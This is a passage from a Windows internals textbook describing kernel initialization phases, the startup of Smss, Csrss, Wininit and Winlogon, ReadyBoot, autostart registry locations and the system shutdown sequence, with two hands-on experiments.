(or to emulate access) to 16-bit real mode interrupts and memory, which are
used mainly by Bootvid (this driver has been replaced by BGFX but still
exists for compatibility reasons).
At this point, InitBootProcessor enumerates the boot-start drivers that
were loaded by Winload and calls DbgLoadImageSymbols to inform the
kernel debugger (if attached) to load symbols for each of these drivers. If the
host debugger has configured the break on symbol load option, this will be
the earliest point for a kernel debugger to gain control of the system.
InitBootProcessor now calls HvlPhase1Initialize, which performs the
remaining HVL initialization that hasn’t been possible to complete in
previous phases. When the function returns, it calls HeadlessInit to initialize
the serial console if the machine was configured for Emergency Management
Services (EMS).
Next, InitBootProcessor builds the versioning information that will be
used later in the boot process, such as the build number, service pack version,
and beta version status. Then it copies the NLS tables that Winload
previously loaded into the paged pool, reinitializes them, and creates the
kernel stack trace database if the global flags specify creating one. (For more
information on the global flags, see Chapter 6, “I/O system,” in Part 1.)
Finally, InitBootProcessor calls the object manager, security reference
monitor, process manager, user-mode debugging framework, and Plug and
Play manager. These components perform the following initialization steps:
1.
During the object manager initialization, the objects that are necessary
to construct the object manager namespace are defined so that other
subsystems can insert objects into it. The system process and the
global kernel handle tables are created so that resource tracking can
begin. The value used to encrypt the object header is calculated, and
the Directory and SymbolicLink object types are created.
2.
The security reference monitor initializes security global variables
(like the system SIDs and Privilege LUIDs) and the in-memory
database, and it creates the token type object. It then creates and
prepares the first local system account token for assignment to the
initial process. (See Chapter 7 in Part 1 for a description of the local
system account.)
3.
The process manager performs most of its initialization in phase 0,
defining the process, thread, job, and partition object types and setting
up lists to track active processes and threads. The systemwide process
mitigation options are initialized and merged with the options
specified in the HKLM\SYSTEM\CurrentControlSet\Control\Session
Manager\Kernel\MitigationOptions registry value. The process
manager then creates the executive system partition object, which is
called MemoryPartition0. The name is a little misleading because the
object is actually an executive partition object, a new Windows object
type that encapsulates a memory partition and a cache manager
partition (for supporting the new application containers).
4.
The process manager also creates a process object for the initial
process and names it idle. As its last step, the process manager creates
the System protected process and a system thread to execute the
routine Phase1Initialization. This thread doesn’t start running right
away because interrupts are still disabled. The System process is
created as protected to get protection from user mode attacks, because
its virtual address space is used to map sensitive data used by the
system and by the Code Integrity driver. Furthermore, kernel handles
are maintained in the system process’s handle table.
5.
The user-mode debugging framework creates the definition of the
debug object type that is used for attaching a debugger to a process
and receiving debugger events. For more information on user-mode
debugging, see Chapter 8, “System mechanisms.”
6.
The Plug and Play manager’s phase 0 initialization then takes place,
which involves initializing an executive resource used to synchronize
access to bus resources.
When control returns to KiInitializeKernel, the last step is to allocate the
DPC stack for the current processor, raise the IRQL to dispatch level, and
enable the interrupts. Then control proceeds to the Idle loop, which causes
the system thread created in step 4 to begin executing phase 1. (Secondary
processors wait to begin their initialization until step 11 of phase 1, which is
described in the following list.)
Kernel initialization phase 1
As soon as the Idle thread has a chance to execute, phase 1 of kernel
initialization begins. Phase 1 consists of the following steps:
1.
Phase1InitializationDiscard, as the name implies, discards the code
that is part of the INIT section of the kernel image in order to preserve
memory.
2.
The initialization thread sets its priority to 31, the highest possible, to
prevent preemption.
3.
The BCD option that specifies the maximum number of virtual
processors (hypervisorrootproc) is evaluated.
4.
The NUMA/group topology relationships are created, in which the
system tries to come up with the most optimized mapping between
logical processors and processor groups, taking into account NUMA
localities and distances, unless overridden by the relevant BCD
settings.
5.
HalInitSystem performs phase 1 of its initialization. It prepares the
system to accept interrupts from external peripherals.
6.
The system clock interrupt is initialized, and the system clock tick
generation is enabled.
7.
The old boot video driver (bootvid) is initialized. It’s used only for
printing debug messages and messages generated by native
applications launched by SMSS, such as the NT chkdsk.
8.
The kernel builds various strings and version information, which are
displayed on the boot screen through Bootvid if the sos boot option
was enabled. This includes the full version information, number of
processors supported, and amount of memory supported.
9.
The power manager’s initialization is called.
10.
The system time is initialized (by calling HalQueryRealTimeClock)
and then stored as the time the system booted.
11.
On a multiprocessor system, the remaining processors are initialized
by KeStartAllProcessors and HalAllProcessorsStarted. The number
of processors that will be initialized and supported depends on a
combination of the actual physical count, the licensing information
for the installed SKU of Windows, boot options such as numproc and
bootproc, and whether dynamic partitioning is enabled (server
systems only). After all the available processors have initialized, the
affinity of the system process is updated to include all processors.
12.
The object manager initializes the global system silo, the per-
processor nonpaged lookaside lists and descriptors, and base auditing
(if enabled by the system control vector). It then creates the
namespace root directory (\), \KernelObjects directory, \ObjectTypes
directory, and the DOS device name mapping directory (\Global??),
with the Global and GLOBALROOT links created in it. The object
manager then creates the silo device map that will control the DOS
device name mapping and attach it to the system process. It creates
the old \DosDevices symbolic link (maintained for compatibility
reasons) that points to the Windows subsystem device name mapping
directory. The object manager finally inserts each registered object
type in the \ObjectTypes directory object.
13.
The executive is called to create the executive object types, including
semaphore, mutex, event, timer, keyed event, push lock, and thread
pool worker.
14.
The I/O manager is called to create the I/O manager object types,
including device, driver, controller, adapter, I/O completion, wait
completion, and file objects.
15.
The kernel initializes the system watchdogs. There are two main types
of watchdog: the DPC watchdog, which checks that a DPC routine
will not execute more than a specified amount of time, and the CPU
Keep Alive watchdog, which verifies that each CPU is always
responsive. The watchdogs aren’t initialized if the system is executed
by a hypervisor.
16.
The kernel initializes each CPU processor control block (KPRCB)
data structure, calculates the Numa cost array, and finally calculates
the System Tick and Quantum duration.
17.
The kernel debugger library finalizes the initialization of debugging
settings and parameters, regardless of whether the debugger has not
been triggered prior to this point.
18.
The transaction manager also creates its object types, such as the
enlistment, resource manager, and transaction manager types.
19.
The user-mode debugging library (Dbgk) data structures are
initialized for the global system silo.
20.
If driver verifier is enabled and, depending on verification options,
pool verification is enabled, object handle tracing is started for the
system process.
21.
The security reference monitor creates the \Security directory in the
object manager namespace, protecting it with a security descriptor in
which only the SYSTEM account has full access, and initializes
auditing data structures if auditing is enabled. Furthermore, the
security reference monitor initializes the kernel-mode SDDL library
and creates the event that will be signaled after the LSA has initialized
(\Security\LSA_AUTHENTICATION_INITIALIZED).
Finally, the Security Reference Monitor initializes the Kernel Code
Integrity component (Ci.dll) for the first time by calling the internal
CiInitialize routine, which initializes all the Code Integrity Callbacks
and saves the list of boot drivers for further auditing and verification.
22.
The process manager creates a system handle for the executive system
partition. The handle will never be dereferenced, so as a result the
system partition cannot be destroyed. The Process Manager then
initializes the support for kernel optional extension (more details are
in step 26). It registers host callouts for various OS services, like the
Background Activity Moderator (BAM), Desktop Activity Moderator
(DAM), Multimedia Class Scheduler Service (MMCSS), Kernel
Hardware Tracing, and Windows Defender System Guard.
Finally, if VSM is enabled, it creates the first minimal process, the
IUM System Process, and assigns it the name Secure System.
23.
The \SystemRoot symbolic link is created.
24.
The memory manager is called to perform phase 1 of its initialization.
This phase creates the Section object type, initializes all its associated
data structures (like the control area), and creates the
\Device\PhysicalMemory section object. It then initializes the kernel
Control Flow Guard support and creates the pagefile-backed sections
that will be used to describe the user mode CFG bitmap(s). (Read
more about Control Flow Guard in Chapter 7, Part 1.) The memory
manager initializes the Memory Enclave support (for SGX compatible
systems), the hot-patch support, the page-combining data structures,
and the system memory events. Finally, it spawns three memory
manager system worker threads (Balance Set Manager, Process
Swapper, and Zero Page Thread, which are explained in Chapter 5 of
Part 1) and creates a section object used to map the API Set schema
memory buffer in the system space (which has been previously
allocated by the Windows Loader). The just-created system threads
have the chance to execute later, at the end of phase 1.
25.
NLS tables are mapped into system space so that they can be mapped
easily by user-mode processes.
26.
The cache manager initializes the file system cache data structures
and creates its worker threads.
27.
The configuration manager creates the \Registry key object in the
object manager namespace and opens the in-memory SYSTEM hive
as a proper hive file. It then copies the initial hardware tree data
passed by Winload into the volatile HARDWARE hive.
28.
The system initializes Kernel Optional Extensions. This functionality
has been introduced in Windows 8.1 with the goal of exporting
private system components and Windows loader data (like memory
caching requirements, UEFI runtime services pointers, UEFI memory
map, SMBIOS data, secure boot policies, and Code Integrity data) to
different kernel components (like the Secure Kernel) without using
the standard PE (portable executable) exports.
29.
The errata manager initializes and scans the registry for errata
information, as well as the INF (driver installation file, described in
Chapter 6 of Part 1) database containing errata for various drivers.
30.
The manufacturing-related settings are processed. The manufacturing
mode is a special operating system mode that can be used for
manufacturing-related tasks, such as components and support testing.
This feature is used especially in mobile systems and is provided by
the UEFI subsystem. If the firmware indicates to the OS (through a
specific UEFI protocol) that this special mode is enabled, Windows
reads and writes all the needed information from the
HKLM\System\CurrentControlSet\Control\ManufacturingMode
registry key.
31.
Superfetch and the prefetcher are initialized.
32.
The Kernel Virtual Store Manager is initialized. The component is
part of memory compression.
33.
The VM Component is initialized. This component is a kernel
optional extension used to communicate with the hypervisor.
34.
The current time zone information is initialized and set.
35.
Global file system driver data structures are initialized.
36.
The NT Rtl compression engine is initialized.
37.
The support for the hypervisor debugger, if needed, is set up, so that
the rest of the system does not use its own device.
38.
Phase 1 of debugger-transport-specific information is performed by
calling the KdDebuggerInitialize1 routine in the registered transport,
such as Kdcom.dll.
39.
The advanced local procedure call (ALPC) subsystem initializes the
ALPC port type and ALPC waitable port type objects. The older LPC
objects are set as aliases.
40.
If the system was booted with boot logging (with the BCD bootlog
option), the boot log file is initialized. If the system was booted in
safe mode, it finds out if an alternate shell must be launched (as in the
case of a safe mode with command prompt boot).
41.
The executive is called to execute its second initialization phase,
where it configures part of the Windows licensing functionality in the
kernel, such as validating the registry settings that hold license data.
Also, if persistent data from boot applications is present (such as
memory diagnostic results or resume from hibernation information),
the relevant log files and information are written to disk or to the
registry.
42.
The MiniNT/WinPE registry keys are created if this is such a boot,
and the NLS object directory is created in the namespace, which will
be used later to host the section objects for the various memory-
mapped NLS files.
43.
The Windows kernel Code Integrity policies (like the list of trusted
signers and certificate hashes) and debugging options are initialized,
and all the related settings are copied from the Loader Block to the
kernel CI module (Ci.dll).
44.
The power manager is called to initialize again. This time it sets up
support for power requests, the power watchdogs, the ALPC channel
for brightness notifications, and profile callback support.
45.
The I/O manager initialization now takes place. This stage is a
complex phase of system startup that accounts for most of the boot
time.
The I/O manager first initializes various internal structures and creates
the driver and device object types as well as its root directories:
\Driver, \FileSystem, \FileSystem\Filters, and
\UMDFCommunicationPorts (for the UMDF driver framework). It
then initializes the Kernel Shim Engine, and calls the Plug and Play
manager, power manager, and HAL to begin the various stages of
dynamic device enumeration and initialization. (We covered all the
details of this complex and specific process in Chapter 6 of Part 1.)
Then the Windows Management Instrumentation (WMI) subsystem is
initialized, which provides WMI support for device drivers. (See the
section “Windows Management Instrumentation” in Chapter 10 for
more information.) This also initializes Event Tracing for Windows
(ETW) and writes all the boot persistent data ETW events, if any.
The I/O manager starts the platform-specific error driver and
initializes the global table of hardware error sources. These two are
vital components of the Windows Hardware Error infrastructure.
Then it performs the first Secure Kernel call, asking the Secure Kernel
to perform the last stage of its initialization in VTL 1. Also, the
encrypted secure dump driver is initialized, reading part of its
configuration from the Windows Registry
(HKLM\System\CurrentControlSet\Control\CrashControl).
All the boot-start drivers are enumerated and ordered while respecting
their dependencies and load-ordering. (Details on the processing of
the driver load control information on the registry are also covered in
Chapter 6 of Part 1.) All the linked kernel mode DLLs are initialized
with the built-in RAW file system driver.
At this stage, the I/O manager maps Ntdll.dll, Vertdll.dll, and the
WOW64 version of Ntdll into the system address space. Finally, all
the boot-start drivers are called to perform their driver-specific
initialization, and then the system-start device drivers are started. The
Windows subsystem device names are created as symbolic links in
the object manager’s namespace.
46.
The configuration manager registers and starts its Windows registry’s
ETW Trace Logging Provider. This allows the tracing of the entire
configuration manager.
47.
The transaction manager sets up the Windows software trace
preprocessor (WPP) and registers its ETW Provider.
48.
Now that boot-start and system-start drivers are loaded, the errata
manager loads the INF database with the driver errata and begins
parsing it, which includes applying registry PCI configuration
workarounds.
49.
If the computer is booting in safe mode, this fact is recorded in the
registry.
50.
Unless explicitly disabled in the registry, paging of kernel-mode code
(in Ntoskrnl and drivers) is enabled.
51.
The power manager is called to finalize its initialization.
52.
The kernel clock timer support is initialized.
53.
Before the INIT section of Ntoskrnl will be discarded, the rest of the
licensing information for the system is copied into a private system
section, including the current policy settings that are stored in the
registry. The system expiration time is then set.
54.
The process manager is called to set up rate limiting for jobs and the
system process creation time. It initializes the static environment for
protected processes, and looks up various system-defined entry points
in the user-mode system libraries previously mapped by the I/O
manager (usually Ntdll.dll, Ntdll32.dll, and Vertdll.dll).
55.
The security reference monitor is called to create the Command
Server thread that communicates with LSASS. This phase creates the
Reference Monitor command port, used by LSA to send commands to
the SRM. (See the section “Security system components” in Chapter 7
in Part 1 for more on how security is enforced in Windows.)
56.
If the VSM is enabled, the encrypted VSM keys are saved to disk.
The system user-mode libraries are mapped into the Secure System
Process. In this way, the Secure Kernel receives all the needed
information about the VTL 0’s system DLLs.
57.
The Session Manager (Smss) process (introduced in Chapter 2,
“System architecture,” in Part 1) is started. Smss is responsible for
creating the user-mode environment that provides the visible interface
to Windows—its initialization steps are covered in the next section.
58.
The bootvid driver is enabled to allow the NT check disk tool to
display the output strings.
59.
The TPM boot entropy values are queried. These values can be
queried only once per boot, and normally, the TPM system driver
should have queried them by now, but if this driver has not been
running for some reason (perhaps the user disabled it), the unqueried
values would still be available. Therefore, the kernel also manually
queries them to avoid this situation; in normal scenarios, the kernel’s
own query should fail.
60.
All the memory used by the loader parameter block and all its
references (like the initialization code of Ntoskrnl and all boot drivers,
which reside in the INIT sections) are now freed.
As a final step before considering the executive and kernel initialization
complete, the phase 1 initialization thread sets the critical break on
termination flag to the new Smss process. In this way, if the Smss process
exits or gets terminated for some reason, the kernel intercepts this, breaks
into the attached debugger (if any), and crashes the system with a
CRITICAL_PROCESS_DIED stop code.
If the five-second wait times out (that is, if five seconds elapse), the
Session Manager is assumed to have started successfully, and the phase 1
initialization thread exits. Thus, the boot processor executes one of the
memory manager’s system threads created in step 22 or returns to the Idle
loop.
Smss, Csrss, and Wininit
Smss is like any other user-mode process except for two differences. First,
Windows considers Smss a trusted part of the operating system. Second,
Smss is a native application. Because it’s a trusted operating system
component, Smss runs as a protected process light (PPL; PPLs are covered in
Part 1, Chapter 3, “Processes and jobs”) and can perform actions few other
processes can perform, such as creating security tokens. Because it’s a native
application, Smss doesn’t use Windows APIs—it uses only core executive
APIs known collectively as the Windows native API (which are normally
exposed by Ntdll). Smss doesn’t use the Win32 APIs, because the Windows
subsystem isn’t executing when Smss launches. In fact, one of Smss’s first
tasks is to start the Windows subsystem.
Smss initialization has been already covered in the “Session Manager”
section of Chapter 2 of Part 1. For all the initialization details, please refer to
that chapter. When the master Smss creates the children Smss processes, it
passes two section objects’ handles as parameters. The two section objects
represent the shared buffers used for exchanging data between multiple Smss
and Csrss instances (one is used to communicate between the parent and the
child Smss processes, and the other is used to communicate with the client
subsystem process). The master Smss spawns the child using the
RtlCreateUserProcess routine, specifying a flag to instruct the Process
Manager to create a new session. In this case, the PspAllocateProcess kernel
function calls the memory manager to create the new session address space.
The executable name that the child Smss launches at the end of its
initialization is stored in the shared section, and, as stated in Chapter 2, is
usually Wininit.exe for session 0 and Winlogon.exe for any interactive
sessions. An important concept to remember is that before the new session 0
Smss launches Wininit, it connects to the Master Smss (through the
SmApiPort ALPC port) and loads and initializes all the subsystems.
The session manager acquires the Load Driver privilege and asks the
kernel to load and map the Win32k driver into the new Session address space
(using the NtSetSystemInformation native API). It then launches the client-
server subsystem process (Csrss.exe), specifying in the command line the
following information: the root Windows Object directory name (\Windows),
the shared section objects’ handles, the subsystem name (Windows), and the
subsystem’s DLLs:
■ Basesrv.dll The server side of the subsystem process
■ Sxssrv.dll The side-by-side subsystem support extension module
■ Winsrv.dll The multiuser subsystem support module
The client–server subsystem process performs some initialization: It
enables some process mitigation options, removes unneeded privileges from
its token, starts its own ETW provider, and initializes a linked list of
CSR_PROCESS data structures to trace all the Win32 processes that will be
started in the system. It then parses its command line, grabs the shared
sections’ handles, and creates two ALPC ports:
■ CSR API command port (\Sessions\<ID>\Windows\ApiPort) This
ALPC Port will be used by every Win32 process to communicate with
the Csrss subsystem. (Kernelbase.dll connects to it in its initialization
routine.)
■ Subsystem Session Manager API Port (\Sessions\
<ID>\Windows\SbApiPort) This port is used by the session manager
to send commands to Csrss.
Csrss creates the two threads used to dispatch the commands received by
the ALPC ports. Finally, it connects to the Session Manager, through another
ALPC port (\SmApiPort), which was previously created in the Smss
initialization process (step 6 of the initialization procedure described in
Chapter 2). In the connection process, the Csrss process sends the name of
the just-created Session Manager API port. From now on, new interactive
sessions can be started. So, the main Csrss thread finally exits.
After spawning the subsystem process, the child Smss launches the initial
process (Wininit or Winlogon) and then exits. Only the master instance of
Smss remains active. The main thread in Smss waits forever on the process
handle of Csrss, whereas the other ALPC threads wait for messages to create
new sessions or subsystems. If either Wininit or Csrss terminate
unexpectedly, the kernel crashes the system because these processes are
marked as critical. If Winlogon terminates unexpectedly, the session
associated with it is logged off.
Pending file rename operations
The fact that executable images and DLLs are memory-mapped when
they’re used makes it impossible to update core system files after
Windows has finished booting (unless hotpatching technology is used,
but that’s only for Microsoft patches to the operating system). The
MoveFileEx Windows API has an option to specify that a file move be
delayed until the next boot. Service packs and hotfixes that must update
in-use memory-mapped files install replacement files onto a system in
temporary locations and use the MoveFileEx API to have them replace
otherwise in-use files. When used with that option, MoveFileEx simply
records commands in the PendingFileRenameOperations and
PendingFileRenameOperations2 keys under
KLM\SYSTEM\CurrentControlSet\Control\Session Manager. These
registry values are of type MULTI_SZ, where each operation is
specified in pairs of file names: The first file name is the source
location, and the second is the target location. Delete operations use an
empty string as their target path. You can use the Pendmoves utility
from Windows Sysinternals (https://docs.microsoft.com/en-
us/sysinternals/) to view registered delayed rename and delete
commands.
Wininit performs its startup steps, as described in the “Windows
initialization process” section of Chapter 2 in Part 1, such as creating the
initial window station and desktop objects. It also sets up the user
environment, starts the Shutdown RPC server and WSI interface (see the
“Shutdown” section later in this chapter for further details), and creates the
service control manager (SCM) process (Services.exe), which loads all
services and device drivers marked for auto-start. The local session manager
(Lsm.dll) service, which runs in a shared Svchost process, is launched at this
time. Wininit next checks whether there has been a previous system crash,
and, if so, it carves the crash dump and starts the Windows Error Reporting
process (werfault.exe) for further processing. It finally starts the Local
Security Authentication Subsystem Service
(%SystemRoot%\System32\Lsass.exe) and, if Credential Guard is enabled,
the Isolated LSA Trustlet (Lsaiso.exe) and waits forever for a system
shutdown request.
On session 1 and beyond, Winlogon runs instead. While Wininit creates
the noninteractive session 0 windows station, Winlogon creates the default
interactive-session Windows station, called WinSta0, and two desktops: the
Winlogon secure desktop and the default user desktop. Winlogon then
queries the system boot information using the NtQuerySystemInformation
API (only on the first interactive logon session). If the boot configuration
includes the volatile Os Selection menu flag, it starts the GDI system
(spawning a UMDF host process, fontdrvhost.exe) and launches the modern
boot menu application (Bootim.exe). The volatile Os Selection menu flag is
set in early boot stages by the Bootmgr only if a multiboot environment was
previously detected (for more details see the section “The boot menu” earlier
in this chapter).
Bootim is the GUI application that draws the modern boot menu. The new
modern boot uses the Win32 subsystem (graphics driver and GDI+ calls)
with the goal of supporting high resolutions for displaying boot choices and
advanced options. Even touchscreens are supported, so the user can select
which operating system to launch using a simple touch. Winlogon spawns the
new Bootim process and waits for its termination. When the user makes a
selection, Bootim exits. Winlogon checks the exit code; thus it’s able to
detect whether the user has selected an OS or a boot tool or has simply
requested a system shutdown. If the user has selected an OS different from
the current one, Bootim adds the bootsequence one-shot BCD option in the
main system boot store (see the section “The Windows Boot Manager”
earlier in this chapter for more details about the BCD store). The new boot
sequence is recognized (and the BCD option deleted) by the Windows Boot
Manager after Winlogon has restarted the machine using NtShutdownSystem
API. Winlogon marks the previous boot entry as good before restarting the
system.
EXPERIMENT: Playing with the modern boot menu
The modern boot menu application, spawned by Winlogon after
Csrss is started, is really a classical Win32 GUI application. This
experiment demonstrates it. In this case, it’s better if you start with
a properly configured multiboot system; otherwise, you won’t be
able to see the multiple entries in the Modern boot menu.
Open a non-elevated console window (by typing cmd in the
Start menu search box) and go to the \Windows\System32 path of
the boot volume by typing cd /d C:\Windows\System32 (where C
is the letter of your boot volume). Then type Bootim.exe and press
Enter. A screen similar to the modern boot menu should appear,
showing only the Turn Off Your Computer option. This is because
the Bootim process has been started under the standard non-
administrative token (the one generated for User Account Control).
Indeed, the process isn’t able to access the system boot
configuration data. Press Ctrl+Alt+Del to start the Task Manager
and terminate the BootIm process, or simply select Turn Off Your
Computer. The actual shutdown process is started by the caller
process (which is Winlogon in the original boot sequence) and not
by BootIm.
Now you should run the Command Prompt window with an
administrative token by right-clicking its taskbar icon or the
Command Prompt item in the Windows search box and selecting
Run As Administrator. In the new administrative prompt, start
the BootIm executable. This time you will see the real modern boot
menu, compiled with all the boot options and tools, similar to the
one shown in the following picture:
In all other cases, Winlogon waits for the initialization of the LSASS
process and LSM service. It then spawns a new instance of the DWM process
(Desktop Windows Manager, a component used to draw the modern
graphical interface) and loads the registered credential providers for the
system (by default, the Microsoft credential provider supports password-
based, pin-based, and biometrics-based logons) into a child process called
LogonUI (%SystemRoot%\System32\Logonui.exe), which is responsible for
displaying the logon interface. (For more details on the startup sequence for
Wininit, Winlogon, and LSASS, see the section “Winlogon initialization” in
Chapter 7 in Part 1.)
After launching the LogonUI process, Winlogon starts its internal finite-
state machine. This is used to manage all the possible states generated by the
different logon types, like the standard interactive logon, terminal server, fast
user switch, and hiberboot. In standard interactive logon types, Winlogon
shows a welcome screen and waits for an interactive logon notification from
the credential provider (configuring the SAS sequence if needed). When the
user has inserted their credential (that can be a password, PIN, or biometric
information), Winlogon creates a logon session LUID, and validates the
logon using the authentication packages registered in Lsass (a process for
which you can find more information in the section “User logon steps” in
Chapter 7 in Part 1). Even if the authentication won’t succeed, Winlogon at
this stage marks the current boot as good. If the authentication succeeded,
Winlogon verifies the “sequential logon” scenario in case of client SKUs, in
which only one session each time could be generated, and, if this is not the
case and another session is active, asks the user how to proceed. It then loads
the registry hive from the profile of the user logging on, mapping it to
HKCU. It adds the required ACLs to the new session’s Windows Station and
Desktop and creates the user’s environment variables that are stored in
HKCU\Environment.
Winlogon next waits the Sihost process and starts the shell by launching
the executable or executables specified in
HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\WinLogon\Userinit (with multiple executables separated
by commas) that by default points at \Windows\System32\Userinit.exe. The
new Userinit process will live in Winsta0\Default desktop. Userinit.exe
performs the following steps:
1.
Creates the per-session volatile Explorer Session key
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Sessio
nInfo\.
2.
Processes the user scripts specified in
HKCU\Software\Policies\Microsoft\Windows\System\Scripts and the
machine logon scripts in
HKLM\SOFTWARE\Policies\Microsoft\Windows\System\Scripts.
(Because machine scripts run after user scripts, they can override user
settings.)
3.
Launches the comma-separated shell or shells specified in
HKCU\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell. If that value doesn’t exist,
Userinit.exe launches the shell or shells specified in
HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\Shell, which is by default
Explorer.exe.
4.
If Group Policy specifies a user profile quota, starts
%SystemRoot%\System32\Proquota.exe to enforce the quota for the
current user.
Winlogon then notifies registered network providers that a user has logged
on, starting the mpnotify.exe process. The Microsoft network provider,
Multiple Provider Router (%SystemRoot%\System32\Mpr.dll), restores the
user’s persistent drive letter and printer mappings stored in HKCU\Network
and HKCU\Printers, respectively. Figure 12-11 shows the process tree as
seen in Process Monitor after a logon (using its boot logging capability).
Note the Smss processes that are dimmed (meaning that they have since
exited). These refer to the spawned copies that initialize each session.
Figure 12-11 Process tree during logon.
ReadyBoot
Windows uses the standard logical boot-time prefetcher (described in Chapter
5 of Part 1) if the system has less than 400 MB of free memory, but if the
system has 400 MB or more of free RAM, it uses an in-RAM cache to
optimize the boot process. The size of the cache depends on the total RAM
available, but it’s large enough to create a reasonable cache and yet allow the
system the memory it needs to boot smoothly. ReadyBoot is implemented in
two distinct binaries: the ReadyBoost driver (Rdyboost.sys) and the Sysmain
service (Sysmain.dll, which also implements SuperFetch).
The cache is implemented by the Store Manager in the same device driver
that implements ReadyBoost caching (Rdyboost.sys), but the cache’s
population is guided by the boot plan previously stored in the registry.
Although the boot cache could be compressed like the ReadyBoost cache,
another difference between ReadyBoost and ReadyBoot cache management
is that while in ReadyBoot mode, the cache is not encrypted. The
ReadyBoost service deletes the cache 50 seconds after the service starts, or if
other memory demands warrant it.
When the system boots, at phase 1 of the NT kernel initialization, the
ReadyBoost driver, which is a volume filter driver, intercepts the boot
volume creation and decides whether to enable the cache. The cache is
enabled only if the target volume is registered in the
HKLM\System\CurrentControlSet\Services\rdyboost\Parameters\ReadyBoot
VolumeUniqueId registry value. This value contains the ID of the boot
volume. If ReadyBoot is enabled, the ReadyBoost driver starts to log all the
volume boot I/Os (through ETW), and, if a previous boot plan is registered in
the BootPlan registry binary value, it spawns a system thread that will
populate the entire cache using asynchronous volume reads. When a new
Windows OS is installed, at the first system boot these two registry values do
not exist, so neither the cache nor the log trace are enabled.
In this situation the Sysmain service, which is started later in the boot
process by the SCM, determines whether the cache needs to be enabled,
checking the system configuration and the running Windows SKU. There are
situations in which ReadyBoot is completely disabled, such as when the boot
disk is a solid state drive. If the check yields a positive result, Sysmain
enables ReadyBoot by writing the boot volume ID on the relative registry
value (ReadyBootVolumeUniqueId) and by enabling the WMI ReadyBoot
Autologger in the
HKLM\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\Readyboot
registry key. At the next system boot, the ReadyBoost driver logs all the
Volume I/Os but without populating the cache (still no boot plan exists).
After every successive boot, the Sysmain service uses idle CPU time to
calculate a boot-time caching plan for the next boot. It analyzes the recorded
ETW I/O events and identifies which files were accessed and where they’re
located on disk. It then stores the processed traces in
%SystemRoot%\Prefetch\Readyboot as .fx files and calculates the new
caching boot plan using the trace files of the five previous boots. The
Sysmain service stores the new generated plan under the registry value, as
shown in Figure 12-12. The ReadyBoost boot driver reads the boot plan and
populates the cache, minimizing the overall boot startup time.
Figure 12-12 ReadyBoot configuration and statistics.
Images that start automatically
In addition to the Userinit and Shell registry values in Winlogon’s key, there
are many other registry locations and directories that default system
components check and process for automatic process startup during the boot
and logon processes. The Msconfig utility
(%SystemRoot%\System32\Msconfig.exe) displays the images configured by
several of the locations. The Autoruns tool, which you can download from
Sysinternals and is shown in Figure 12-13, examines more locations than
Msconfig and displays more information about the images configured to
automatically run. By default, Autoruns shows only the locations that are
configured to automatically execute at least one image, but selecting the
Include Empty Locations entry on the Options menu causes Autoruns to
show all the locations it inspects. The Options menu also has selections to
direct Autoruns to hide Microsoft entries, but you should always combine
this option with Verify Image Signatures; otherwise, you risk hiding
malicious programs that include false information about their company name
information.
Figure 12-13 The Autoruns tool available from Sysinternals.
Shutdown
The system shutdown process involves different components. Wininit, after
having performed all its initialization, waits for a system shutdown.
If someone is logged on and a process initiates a shutdown by calling the
Windows ExitWindowsEx function, a message is sent to that session’s Csrss
instructing it to perform the shutdown. Csrss in turn impersonates the caller
and sends an RPC message to Winlogon, telling it to perform a system
shutdown. Winlogon checks whether the system is in the middle of a hybrid
boot transition (for further details about hybrid boot, see the “Hybernation
and Fast Startup” section later in this chapter), then impersonates the
currently logged-on user (who might or might not have the same security
context as the user who initiated the system shutdown), asks LogonUI to fade
out the screen (configurable through the registry value
HKLM\Software\Microsoft\Windows
NCurrentVersion\Winlogon\FadePeriodConfiguration), and calls
ExitWindowsEx with special internal flags. Again, this call causes a message
to be sent to the Csrss process inside that session, requesting a system
shutdown.
This time, Csrss sees that the request is from Winlogon and loops through
all the processes in the logon session of the interactive user (again, not the
user who requested a shutdown) in reverse order of their shutdown level. A
process can specify a shutdown level, which indicates to the system when it
wants to exit with respect to other processes, by calling
SetProcessShutdownParameters. Valid shutdown levels are in the range 0
through 1023, and the default level is 640. Explorer, for example, sets its
shutdown level to 2, and Task Manager specifies 1. For each active process
that owns a top-level window, Csrss sends the WM_QUERYENDSESSION
message to each thread in the process that has a Windows message loop. If
the thread returns TRUE, the system shutdown can proceed. Csrss then sends
the WM_ENDSESSION Windows message to the thread to request it to exit.
Csrss waits the number of seconds defined in HKCU\Control
Panel\Desktop\HungAppTimeout for the thread to exit. (The default is 5000
milliseconds.)
If the thread doesn’t exit before the timeout, Csrss fades out the screen and
displays the hung-program screen shown in Figure 12-14. (You can disable
this screen by creating the registry value HKCU\Control
Panel\Desktop\AutoEndTasks and setting it to 1.) This screen indicates
which programs are currently running and, if available, their current state.
Windows indicates which program isn’t shutting down in a timely manner
and gives the user a choice of either killing the process or aborting the
shutdown. (There is no timeout on this screen, which means that a shutdown
request could wait forever at this point.) Additionally, third-party
applications can add their own specific information regarding state—for
example, a virtualization product could display the number of actively
running virtual machines (using the ShutdownBlockReasonCreate API).
Figure 12-14 Hung-program screen.
EXPERIMENT: Witnessing the HungAppTimeout
You can see the use of the HungAppTimeout registry value by
running Notepad, entering text into its editor, and then logging off.
After the amount of time specified by the HungAppTimeout
registry value has expired, Csrss.exe presents a prompt that asks
you whether you want to end the Notepad process, which has not
exited because it’s waiting for you to tell it whether to save the
entered text to a file. If you select Cancel, Csrss.exe aborts the
shutdown.
As a second experiment, if you try shutting down again (with
Notepad’s query dialog box still open), Notepad displays its own
message box to inform you that shutdown cannot cleanly proceed.
However, this dialog box is merely an informational message to
help users—Csrss.exe will still consider that Notepad is “hung”
and display the user interface to terminate unresponsive processes.
If the thread does exit before the timeout, Csrss continues sending the
WM_QUERYENDSESSION/WM_ENDSESSION message pairs to the other
threads in the process that own windows. Once all the threads that own
windows in the process have exited, Csrss terminates the process and goes on
to the next process in the interactive session.
If Csrss finds a console application, it invokes the console control handler
by sending the CTRL_LOGOFF_EVENT event. (Only service processes
receive the CTRL_SHUTDOWN_EVENT event on shutdown.) If the handler
returns FALSE, Csrss kills the process. If the handler returns TRUE or
doesn’t respond by the number of seconds defined by HKCU\Control
Panel\Desktop\WaitToKillTimeout (the default is 5,000 milliseconds), Csrss
displays the hung-program screen shown in Figure 12-14.
